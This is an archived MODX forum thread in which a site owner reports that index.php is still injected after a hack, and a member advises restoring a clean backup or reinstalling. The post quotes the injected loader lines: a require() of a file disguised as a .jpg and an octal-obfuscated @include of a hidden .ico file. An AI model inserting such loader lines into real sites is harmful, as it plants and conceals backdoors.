We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
MODX Community Forums Archive

hacked the index.php still injected

    • 473
    • 70 Posts
    Adhi Reply #1, 5 years, 8 months ago
    I have updated modx 2.6.5 and gallery 1.7.1 but index.php still inject scripts like this:
    //installbg
$rifilename='/srv/users/serverpilot/apps/amfg/public/assets/brosur/thumb/10-Indofigur NEWs.jpg-';
require("$rifilename");
//installend



/*35dd8*/

@include "\057srv/\165sers\057serv\145rpil\157t/ap\160s/am\146g/pu\142lic/\141sset\163/com\160onen\164s/ti\156ymce\057.fb9\06523dc\056ico";

/*35dd8*/

    please help to clean up
      • 3749
      • 24,544 Posts
      BobRay Reply #2, 5 years, 8 months ago
      Upgrading MODX and Gallery won't help clean your site, since hackers almost always leave non-MODX files they can use to get back in. The best solution is to restore a backup from before the hack and then upgrade MODX and Gallery.

      If you don't have such a backup, you can either try to find and remove all the offending files, or back up your site, wipe everything, install a clean new version, and cut-and-paste your content and users into the new site.

        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting